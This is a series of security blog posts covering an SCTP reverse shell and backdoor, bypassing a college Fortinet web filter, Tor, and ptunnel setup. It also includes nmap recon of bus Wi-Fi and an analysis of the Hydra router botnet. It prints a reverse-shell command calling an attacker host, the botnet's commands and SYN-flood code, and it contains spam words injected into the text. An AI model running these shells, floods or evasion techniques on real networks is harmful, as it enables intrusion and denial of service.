TinySHell – Ported to SCTP

You may have seen, a while ago, my post on SCTP reverse shells.

I realized quite quickly that I should definately do some more research in this direction, and hence ported one of my favourite Unix backdoors (which uses a TCP connection) to use a SCTP connection instead. This backdoor allows for a remote PTY, file upload, and file download. It also is encrypted connection.

The backdoor in question is ‘TinySHell’ by the inestimable Christophe Devine (who left quite a legacy of code, which I may start to maintain as he appears to have vanished. Chris, if you are out there, get in touch or something! Love your work!). I spent a short while examining the code, then quickly patched it up to replace all the TCP stuff with SCTP stuff. I imagine I could easily alter it to do UDP, and might try that later.

Anyways, without further ado, here is the code. Again, all credit to Chris, all I did was modify it!

https://github.com/infodox/tsh-sctp

Aaaand a video of it in-use (rough cut, no editing, some freezing. Will clean up later)


Also, we have not died here. Some, er, circumstances lead to extended hiatus in publication of research material.

Happy pwning!

SCTP Reverse Shell

So, buy over the last while I was looking at “Interesting” ways to throw back a reverse shell and remain under the radar a little bit. UDP, TCP and ICMP reverse shells have been done to death (heck, you can even use DNS tunneling), so I had the daft idea to try SCTP.

I noticed while testing it, many rubbish “Security in a box” firewalls do not actually parse SCTP packets at all, and just let them zip right through the firewall without checking their contents. So it looked like a perfect candidate for data exfiltration, spawning reverse shells, and other such mischief :)

Anyway, at first I tested the idea out using ncat (from nmap), which features SCTP support and basically is a full replacement for netcat.

NOTE: SCTP support should be enabled by default on Linux. If it aint, do “modprobe sctp” and see does it work then. I found that OpenVZ virtual machines tend to not have SCTP support, depending on if it is supported on the host or not.

With ncat, doing the following is enough to deliver a reverse shell over SCTP.

rootedbox:~# ncat –sctp -c /bin/sh attackerip port

attacker:~# ncat –sctp -l -v -p port

Screenshot of this:

sctp reverse shell with netcat

sctp reverse shell with netcat

So, we can do it with ncat, however I wanted to see how hard it would be to implement this in python.

Luckily, there is a python module for making SCTP connections – pysctp. It behaves very similarly to the socket module.

After a bit of playing around, I managed to implement a reverse shell over SCTP in python, which you can find here: http://packetstorm.igor.onlinedirect.bg/UNIX/penetration/rootkits/sctp_reverse.py.txt

Screenshot:

python sctp reverse shell

SCTP Reverse shell in python

Further development includes implementing SSL – it works, just tends to randomly die because pythons SSL library is rubbish, and writing these payloads in a native language (C) as opposed to python. Lots more to do here!

 

Punching through the Fortinet – Web Filter Evasion

Today, cialis 20th of March 2013, I went into college as per normal, and tried accessing this site to upload a new post (which is now in drafts, I will publish it over the weekend). Anyway, I ran straight into this:

censored

Me, sales blocked.

I, quite naturally, became quite irate. I had missed my morning cup of coffee due to a delayed bus, and now this. Blocked. Censored. Denied.
I had gotten used to seeing this “page” quite often, as my web browsing habits (Security websites) tend to get flagged as “hacking” and suchlike. However, seeing my site blatantly blacklisted as a “malicious website”, i.e. one which slings malware at its viewers, was a step too bloody far.

After a slight rage-fest on twitter, and several angry emails sent to various responsible persons (all of whom denied any responsibility so far, cowards!) I decided the best course of action would be publishing a guide on getting around these shitty web filters. As it so happens, Fortinet has a bigger gaping hole, than, well, Goatse.
Generally speaking, the best way around any of this crap, is to tunnel right through them. I shall outline the methods I have used with the most success over the last few months of putting up with this nonsense.

TOR – The Onion Router.
So, the last few posts concentrated on getting you TOR set up, and are linked at the bottom of this post. There is a very valid reason for this, and it is rather simple.

Fortinet “FortiGard” has no bloody clue what TOR is, and does not block it. I can surf freely all day long without seeing a single “blocked” page, provided I am willing to tolerate severely throttled speeds and “the lag of TOR” during the connecting phase.

So, if you are stuck behind a Fortinet, TOR up! It is beneficial to your internet-health anyway! It makes you less traceable!

For TOR installation details, see the following posts:
Installing TOR on Ubuntu
Installing TOR on Windows
Installing Torbutton

Now, if they have blocked TOR, the following tricks will work:

SSH tunnels to port 443.
For a free shell that supports SSH to port 443, go to CJB.NET Shells
If, for some reason, even that fails… Let me know! I have had some luck with DNS tunnelling also.

So, in conclusion: Fortinet is trivial to bypass, you can do it blindfolded.

Installing Torbutton

I almost thought a Torbutton install post was pointless, ailment until I realized a lot of people still manage to screw it up.
Somehow. I have no idea exactly how…
Anyways, onward! I will assume you have read http://insecurety.net/?p=847 and http://insecurety.net/?p=842 and gotten TOR working for you.

The following works on any platform once TOR/Vidalia is installed. TORbutton makes irreversable changes to Firefox, so you should install Firefox specifically for this!

In Firefox navigate to torproject.org/torbutton

Click the install link near bottom of page. The one that reads “Expert Install” “Install from this page”
Allow it to do voodoo magic.

torbutton install

torbutton install

Once Torbutton installs and Firefox restarts, navigate to check.torproject.org

It Works!

It Works!

If you are seeing this, it clearly worked and you are good to go! Now onward we go!

 

Installing TOR On Ubuntu Linux

Seeing as Ubuntu is one of the most commonly used Linux distros around, tadalafil and because I cannot be bothered getting a Fedora .iso, and because these instructions work fine for Debian also, here goes! (yes, in the images I am using BT5, which is basically Ubuntu)

To get your distribution name, the command “lsb_release -c” will tell you. This is important.

First off, sovaldi sale add the appropriate repository to your /etc/apt/sources.list file.

Essentially this command:
sudo echo “deb http://deb.torproject.org/torproject.org <DISTRIBUTION> main” >> /etc/apt/sources.list

Adding TOR repo

Adding TOR repo

Next, capsule we import the tor project GPG keys. I advise being root when doing this.

gpg –keyserver keys.gnupg.net –recv 886DDD89
gpg –export A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89 | sudo apt-key add –

Adding GPG keys

Adding GPG keys

sudo apt-get update to refresh your package lists…

Update Package List

Update Package List

Now we install the torproject keyring.

apt-get install deb.torproject.org-keyring

keyring install

Installing Keyring

Install TOR itself and the Vidalia GUI… It will prompt to add a user to the group so select your username!!!

apt-get install vidalia tor polipo

Installing TOR

Installing TOR

Now, we check is Vidalia working OK or are we already fscked. By running it.

Vidalia Works

Vidalia Works

If it looks like that, you are good to go smile Again, as per http://insecurety.net/?p=842 , just set proxy settings in your browser to use 127.0.0.1 and 9050 as the port and you should be good to go!

Next up: Installing TORbutton :)

The observant ones will note the dates on the screenshots are old: I had originally made this guide for some friends who wanted it, and then I decided to publish it openly because, reasons.

 

 

 

TOR Setup – Windows

/*
This is part one of a multipart posting series that’s gonna go on all evening before el grande finale of using TOR and suchlike to bypass Fortinet Web Filters and other such bullshit censorship warez. The two TOR install posts will go up first, followed by the ranty bypassing one, then some other stuff :3

Please note, these installation guides are for non technical people in a sense, I literally try hold the users hand as much as possible…
*/

Well, if anyone here is as paranoid as I am, they probably wonder how the hell they can prevent their online activities from being traced back to them. So, in the interest of helping others anonymize their online presence, I have decided to knock up a few simple enough guides on installing and using various pieces of anonymity software, starting with the TOR bundle for Windows.

So. You should navigate yourself to torproject.org, and go to the downloads section.

Downloading TOR

Downloading TOR

Assuming you installed Firefox ages back (I hope to god ye arent using IE…) install the Vidalia bundle. Just download it, run the executable file, tick all the boxes (i.e. full install) and fire ahead. It will pop during the install.

Installing Vidalia Bundle

Installing Vidalia Bundle

Finally, let TOR run, and you should see the following after up to two minutes or so:

TOR works

TOR is now running

Bingo. That is TOR installed and running, and as you can see, it is VERY simple to use. To make it work with Firefox for anonymized browsing: Edit -> Preferences -> Advanced -> Network -> Settings -> Set proxy as: SOCKS5 (type), and 127.0.0.1 as IP and 9050 as port. I don’t think I can get much more simple than that.
 

Back… With exploits!

So, sovaldi finally my DNS issues and suchlike got sorted out, and the server has been migrated to a new host. Email is back as of a few hours ago (few issues with MX records and mailboxes or something and emails being delivered 10 times to me, but I think that will fix itself after a few days. I hope so anyway, because being bombed with 100 messages 10 times each is getting plenty bloody annoying).

Everything is upgraded to the new wordpress, no more nasty hacking the config files to get WP to work on a server not designed to run it.

So, while the site was “inactive”, I was working on a whole bunch of new content (and finishing old articles) to publish. Seeing as I have exams, I shall just leave a few gifts here for you to look at until they are over. dietrich may have something for you also :)

So, in order to keep everyone entertained for the next few days, check out the following piece of exploit engineering.

D-LINK DIR-300 and DIR-600 routers have a hilarious preauth remote root flaw in their web interface. A webpage called “command.php” that accepts a “cmd=$cmd” and executes it as root. EPIC FAIL. Why was that there? Ask D-LINK.

It was discovered by a German researcher, @s3cur1ty_de and you can read his original advisory here: http://www.s3cur1ty.de/m1adv2013-003

I had some free time in college, so I knocked up a quick PoC tool to exploit the flaw, and even managed to test the exploit on a friends router after class.

PoC Code: http://pastebin.com/raw.php?i=yPDKP86n

Remote Root

Remote Root

It delivers my customary user friendly shell interface, exploiting command injection. It can also autoenable TELNET and grant Telnet access, though this is seemingly less reliable, it hung when I tried it after rebooting the router.

Will be writing some more exploits, and maybe publishing them soon, so stay tuned ;)

Ptunnel Setup and Usage (Server Side)

This article will show you  how to setup and use the ptunnel Ping tunnelling application.
This is just the server side setup, cure I will write the client side later.

More info about ptunnel here: http://www.cs.uit.no/~daniels/PingTunnel/

First off, on the server (assuming a Debian/Ubuntu Linux server that you have root access to, I do not bother with other version)

apt-get update
apt-get install libpcap-dev
apt-get install make

Install Dependancies

next, sovaldi sale download the ptunnel source code onto the server.

wget http://www.cs.uit.no/~daniels/PingTunnel/PingTunnel-0.72.tar.gz

Unpack the tarball and cd into its directory

tar -xf PingTunnel-0.72.tar.gz
cd PingTunnel

Download and unpack ptunnel

Type “make” to build it

make

Finally, on the server, you will want to install “screen”

apt-get install screen

screen -S pingtunnel
./ptunnel

Pingtunnel running

NOTE: To add a password, use ./ptunnel -x password

Now hold down CTRL and press A then D to detatch from screen.

Detatch from screen

That is the Ping Tunnel Server set up and running :D

When I have time, I will write the article about client side usage. Busy atm.

Buses, 802.11, and hilarity.

Ok. Just a short thing I noticed while connecting to “MoovManage” access point today on the bus.

I was sitting there, waiting for the laggy web auth thing to finish, and decided to have a quick look at what GET params I was sending. Sadly, I forgot to run a capture and harvest them, but I did notice that it gave away some interesting bits of data. ** See below, I got em! **

First off, one param was telling me about 10.0.0.1, and another 10.0.0.4. Another parameter contained my MAC address in the format 00-00-00blahblah

There were various other “bits” sent, that looked a bit like cookies, but I quickly realized that those were likely just extra fluff sent by the app. There was also the original request I made (http://www.google.com/) and a redirect to unnamedbuscompany.com (obviously I am redacting some data!)

There was also a reference to port 3306… What runs on 3306? MySQL.. So I am beginning to wonder, should I reconnect later (with a different MAC address – I have 3 wireless interfaces, Macchanger, and some SERIOUS curiosity) and run a sniffer/MITM proxy to see what is going on? Could be all kinds of data leakage there… maybe even connection params to MySQL Server?

Now for the “ideas”. Those GET params… XSS? SQLi? Who knows! A persistent XSS in such an app would allow you to harvest all kinds of data I imagine, like people connecting’s MAC addresses, sites they requested (+ get params associated), and their “intranet” IP. You could also force redirects to ads, malware, or phishing sites – the application already has redirects in place, but using an XSS vuln to introduce a “new” redirect to “facebook.com” or “gmail.com” would be… Fascinating.

Just some random thoughts :) (Its morning and /dev/brain has not mounted fully…)

## Some time later ##

So I got curious. As we all do. So I ran an nmap scan, as I don’t enjoy sharing my network space with unknown devices.

Here be the results… With SSL certs and such redacted because. Well because I felt like it!

user@brokenhost:~$ sudo nmap -sS -sV -A -O -vvv 10.0.0.1

Starting Nmap 6.02 ( http://nmap.org ) at 2012-06-20 09:21 IST
NSE: Loaded 96 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 2) scan.
NSE: Starting runlevel 2 (of 2) scan.
Initiating ARP Ping Scan at 09:21
Scanning 10.0.0.1 [1 port]
Completed ARP Ping Scan at 09:21, 0.03s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 09:21
Completed Parallel DNS resolution of 1 host. at 09:21, 0.19s elapsed
DNS resolution of 1 IPs took 0.19s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 09:21
Scanning 10.0.0.1 [1000 ports]
Discovered open port 443/tcp on 10.0.0.1
Discovered open port 22/tcp on 10.0.0.1
Discovered open port 53/tcp on 10.0.0.1
Completed SYN Stealth Scan at 09:21, 7.73s elapsed (1000 total ports)
Initiating Service scan at 09:21
Scanning 3 services on 10.0.0.1
Completed Service scan at 09:22, 13.30s elapsed (3 services on 1 host)
Initiating OS detection (try #1) against 10.0.0.1
NSE: Script scanning 10.0.0.1.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 09:22
Completed NSE at 09:22, 26.50s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Nmap scan report for 10.0.0.1
Host is up (0.0071s latency).
Scanned at 2012-06-20 09:21:50 IST for 49s
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 3.8.1p1 Debian 8.sarge.2 (protocol 2.0)
| ssh-hostkey: 1024 [REDACTED] (RSA)
|_ssh-rsa
[REDACTED]
53/tcp open domain dnsmasq 2.46
| dns-nsid:
|_ bind.version: dnsmasq-2.46
443/tcp open ssl/http thttpd 2.25b
| sslv2: server still supports SSLv2
| SSL2_DES_192_EDE3_CBC_WITH_MD5
| SSL2_RC2_CBC_128_CBC_WITH_MD5
| SSL2_RC4_128_WITH_MD5
| SSL2_DES_64_CBC_WITH_MD5
|_ SSL2_RC4_128_EXPORT40_WITH_MD5
| ssl-cert: Subject:

[ SOME DATA REDACTED ]

Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:kernel:2.6
OS details: Linux 2.6.13 – 2.6.32
TCP/IP fingerprint:
OS:SCAN(V=6.02%E=4%D=6/20%OT=22%CT=1%CU=39626%PV=Y%DS=1%DC=D%G=Y%M=000B6B%T
OS:M=4FE1884F%P=i686-pc-linux-gnu)SEQ(SP=C9%GCD=1%ISR=CA%TI=Z%CI=Z%II=I%TS=
OS:8)OPS(O1=M5B4ST11NW8%O2=M5B4ST11NW8%O3=M5B4NNT11NW8%O4=M5B4ST11NW8%O5=M5
OS:B4ST11NW8%O6=M5B4ST11)WIN(W1=16A0%W2=16A0%W3=16A0%W4=16A0%W5=16A0%W6=16A
OS:0)ECN(R=Y%DF=Y%T=41%W=16D0%O=M5B4NNSNW8%CC=N%Q=)T1(R=Y%DF=Y%T=41%S=O%A=S
OS:+%F=AS%RD=0%Q=)T2(R=N)T3(R=Y%DF=Y%T=41%W=16A0%S=O%A=S+%F=AS%O=M5B4ST11NW
OS:8%RD=0%Q=)T4(R=Y%DF=Y%T=41%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=41%W
OS:=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=41%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)
OS:T7(R=Y%DF=Y%T=41%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=41%IPL=164%U
OS:N=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=41%CD=S)

Uptime guess: 0.044 days (since Wed Jun 20 08:19:58 2012)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=201 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:kernel

TRACEROUTE
HOP RTT ADDRESS
1 7.06 ms 10.0.0.1

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 09:22
Completed NSE at 09:22, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Read data files from: /usr/local/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 52.56 seconds
Raw packets sent: 1073 (47.958KB) | Rcvd: 1032 (41.990KB)

So, it is some kind of embedded Linux box (Debian) running an unusual HTTPd, an odd DNS server, and a ridiculously outdated version of SSH. Which I am sure is probably exploitable.

I also would guess ARM or MIPS/MIPSEL architecture, though do not hold me to that, as that is just a guess. I do not think it is running x86. Further poking was not done lest laws be violated – looking at something is OK, but actually trying to break into it, is NOT OK. Hence, I did not bother search for an exploit or anything. I might analyse the results later and publish ideas on owning these things, but not now.

To be honest, I want to buy one of these devices to poke at it some more, would love to find some vulns in them. They are embedded devices, ergo sexy as fuck!

Ok, so on my return trip I captured the GET it made. Here it is, dissected…

https://portal.moovmanage.com/setup/1082/2?res=notyet

&uamip=[GATEWAY IP] # 10.0.0.1
&uamport=3990 # How interesting, last time it was 3306… Perhaps random?
&challenge=1ae780936302d93e8a408936ab128209 # MD5 hash, have not cracked it… YET!
&mac=[MY MAC ADDRESS] # LOL, as if I was going to expose that ;)
&ip=[MY LAN IP ADDRESS] # 10.0.0.(removed)
&called=[ROUTER MAC ADDRESS] # Don’t track me bro…
&nasid=1082 # No clue what you are… YET
&userurl=http%3a%2f%2fgoogle.com%2f # Oh how nice. Thats where I was going :3
&md=584472E656ADD831B5D3060AA9B35E4B # MD5 hash, have not cracked it… YET!

So, I was wrong about the MySQL Server connection, but it DOES make some kind of connection, likely a “VPN” setup or something, or maybe that is the port my traffic exits the network via. I do not know yet.

Hydra IRC bot, the 25 minute overview of the kit.

Hydra IRC bot, the 25 minute overview of the kit. (25 minutes to write and “do”, not to read!)

The Hydra IRC botnet kit is a very interesting sample that we have in our collection. It is, essentially, “RX-Bot for Routers”. By this, we mean it is an extensible, well documented (in the source), open source botnet framework which is freely available for anyone to download. The problem, of course, is locating a copy.

Unlike other IRC bots targetting the “Linux” platform, for example, the “Kaiten” series of bots written in C, or the “ShellBot” series of bots written in various scripting languages, the Hydra is a more carefully developed framework, and by design is far more extensible than the others.

While the Kaiten family offer potent DDoS capabilities, they totally lack spreading tools – in order to “spread” a Kaiten effectively, you would have to root Linux servers en-masse. The Hydra, has built in worm-like capabilities, allowing it to automatically seek out and infect new victims.

The shellbots DO spread, and may even infect other platforms/architectures (being written in scripting languages means they will run on anything that has an interpreter), however their DDoS capabilities are weak, and they tend to be rather “hacky” programs.

Furthermore, while the Kaiten bots are almost limited to the x86-Linux platform (they stubbornly refuse to compile on much else), the Hydra series is designed to run on damn near anything – in particular, MIPSEL routers.

Most interesting of all, however, is the fact that the development of these elegant pieces of malware has not progressed much. Wheras the Kaiten and Shellbot are constantly being remade, the Hydra, being a far more impressive – and complex – piece of code, is pretty much ignored by your contemporary developer of Unix malware. This is unusual, as its counterpart on Windows – RXbot, was developed almost religiously.

Anyways, on we go. Lets crack open the archive and see what is inside!

Contents of the Archive:
infodox@shinigami:~/router/hydra$ ls -R
.:
ChangeLog – Changelog for this version.
include – Directory of header files.
Makefile – Makefile.
README – Readme.
source – Main source code files.

./include:
hydra_conf.h – Bot configuration header file.
hydra_irc.h – IRC header file.
hydra_mesg.h – Messages it prints to channel for various purposes.
hydra_scan.h – Variables used in vulnerability scanning/exploitation.
hydra_utils.h – Currently just a variable to assign to process ID for daemonizing.
hydra_hds.h – File containing list of header files.
hydra_main.h – Just some variables.
hydra_reqs.h – More variables, version number, etc.
hydra_synf.h – Headers/Variables for SYN Flooding.

./source:
hydra_irc.c – IRC handling code.
hydra_reqs.c – Command parsing code apparently.
hydra_synf.c – SYN Flooding/DDoS Functions.
hydra_main.c – main() function.
hydra_scan.c – Scanning functions for owning routers.
hydra_utils.c – Functions used for daemonizing, host2ip, etc. “Utilities”.

As you can see, it is a fairly well-crafted piece of software, in that the developers did not try jam everything in one source file, like the developers of Kaiten and the ShellBots do. Instead, everything is split up rather neatly. This would make future development FAR easier than hacking on one file!

So, lets take a look at what version we got, and its changelog!

– Begin Changelog –

Hydra 2008.1 stable (released 2008-02-23)

* added input line parser.
* added irc connection random ident string.
* added source address synflood spoofing.
* added daemonize manage function for quiet debug
* fixed ‘upgrade’ same file replace bug.
* fixed serveral error messages.
* removed an command ‘reclst’ for unutility.
* source code completly rewrite.

– End Changelog –

So, it would seem that this was the “first release of 2008”. And the changelog itself makes me think the developer was doing some serious work on it – rewriting the source code completely, fixing bugs, removing useless functions and commands… It makes me wonder were there previous variants that I have simply not obtained yet.

Onward we go to the Makefile, and for brevity I only include the relevant snippet here – the rest is pretty much “normal”.

– Begin Makefile Snippet –

CFLAGS=
x86_CC=/usr/bin/gcc
MIPSEL_CC=/opt/hardhat/previewkit/mips/mipsel-linux-uclibc/bin/mipsel-uclibc-gcc
x86_VERS=hydra_x86_bin_2008.1
MIPSEL_VERS=hydra_mipsel_bin_2008.1

– End Makefile Snippet –

So, we can clearly see, this version supports the MIPSEL and x86 architectures, and I do wonder who “hardhat” is… Don’t you?

The fact the author wrote a somewhat decent makefile suggests either an IDE of some kind that auto-generates them for you, or, a somewhat competent author. Having had difficulty getting ANYTHING to run on MIPSEL routers in the past, I will go with “competent”.

Lets take a look at the readme, see if we can gather more data! As @TheResGroup says, “we love data”.

First off, the author is not a native English speaker. Second, his email is proudly on display as “esaltato@autistici.org”. I checked autistici.org, it seems to be some kind of Privacy collective, similar to Riseup.net (who, by the way, are AWESOME). It also makes me think of Italy, and there is more evidence for this later on when we see the predefined C&C server.

In the readme, he describes his program in the following manner:
“Hydra is a mass-tool commanded by irc that allows scanners and exploited dlink router for make BOTNET (rx-bot style), in addition to this, with void you can attack with tcp/udp flood.”
Ok, so we know his intention – an RX Bot style bot for routers, in particular, D-Link routers. Now, unless I am terribly mistaken, the D-Link routers run DD-WRT of some kind, which is basically MIPSEL Linux. Which is why this bot works so damn well.

The interesting thing is, he does NOT give a command list in the readme! So the user could setup their botnet, then realize they have NO clue how to use it!

So, lets go find the commands, and figure out what they do!

By opening source/hydra_main.c we get the following:

– Begin Hydra Command List –

* *** Access Commands:
*
* .login <password> – login to bot’s party-line
* .logout – logout from bot’s party-line
*
* *** Misc Commands
*
* .upgrade <url> <binary_name> – upgrade binary from http url
* .version – show the current version of bot
* .status – show the status of bot
* .help – show this help message
*
* *** Scan Commands
*
* .scan <a> <b> <user> <passwd> – scanner/exploit with user:passwd
* .advscan <a> <b> – scanner/exploit with auto user:passwd
* .recursive – scanner/exploit with localip scan
* .recrd – advscan with local addr (B-range random)
* .stop – stop all actions (scan/flood)
*
* *** DDOS Commands:
*
* .synflood <host> <port> <secs> – standard synflooder
*
* *** IRC Commands:
*
* .join <channel> <password> – join bot in selected room
* .part <channel> – part bot from selected room
* .quit – kill the current process
*

– End Hydra Command List –

So. While the README tells us we have both UDP/SYN flooding, the commands only offer SYN. Which makes me assume we are missing some commands! Having poked through the source, the UDP flooding functionality is simply not there, so I assume it is not implemented in this version.

Now that we have an overview of the bots capabilities, let’s take a look at the DDoS code in it, before I wrap this post up. Please note – this post is essentially a “teaser” of a paper me and a fellow researcher are writing on this kind of malware, and trust me – that paper is gonna be badass.

– Begin TCP Packet Creation Snippet – source/hydra_synf.c –

/* form tcp packet */
send_tcp.tcp.source = getpid();
send_tcp.tcp.dest = htons(dest_port);
send_tcp.tcp.seq = getpid();
send_tcp.tcp.ack_seq = 0;
send_tcp.tcp.res1 = 0;
send_tcp.tcp.doff = 5;
send_tcp.tcp.fin = 0;
send_tcp.tcp.syn = 1;
send_tcp.tcp.rst = 0;
send_tcp.tcp.psh = 0;
send_tcp.tcp.ack = 0;
send_tcp.tcp.urg = 0;
send_tcp.tcp.window = htons(512);
send_tcp.tcp.check = 0;
send_tcp.tcp.urg_ptr = 0;

– End TCP Packet Creation Snippet – source/hydra_synf.c –

As we can see, it is sending a SYN packet, with a window size of 512, to a specified port. It uses its PID as the sequence number and has an offset of 5. Surely a detection could be written, but I am sure it would be littered with false positives.

Now, I am not an expert, but the following snippet makes me think maybe it is threading the function to run 50 times – I do not see any calls to fork(), but it seems to have a loop here that increments a counter (vt) every time a thread runs.

– Begin Threading Snippet –

if (vt >= 50)
{
if (time(NULL) >= start + ntime)
{
arg_send(sp->s_fd, end_synflood, irc_room);
max_pids–;

exit(0);
}

vt = true;
}

vt++;
}

– End Threading Snippet –

It would appear that this snippet runs a counter, which SYN floods with 50 threads for X time, and alerts the IRC room when it is done. Fairly standard fare for an IRC bot, however most thread numbers I see are 64/128/256 in other bots/DDoS tools. Likely they use less threads due to the limited CPU capabilities of embedded devices, or, maybe the programmer just wanted to use 50 threads…

This concludes my “brief writeup” on the Hydra, and in an upcoming paper I will be covering it in more depth – including its propagation mechanisms and other interesting things that we find, including the hardcoded C&C, configuration settings, and such.

Hope you enjoyed :)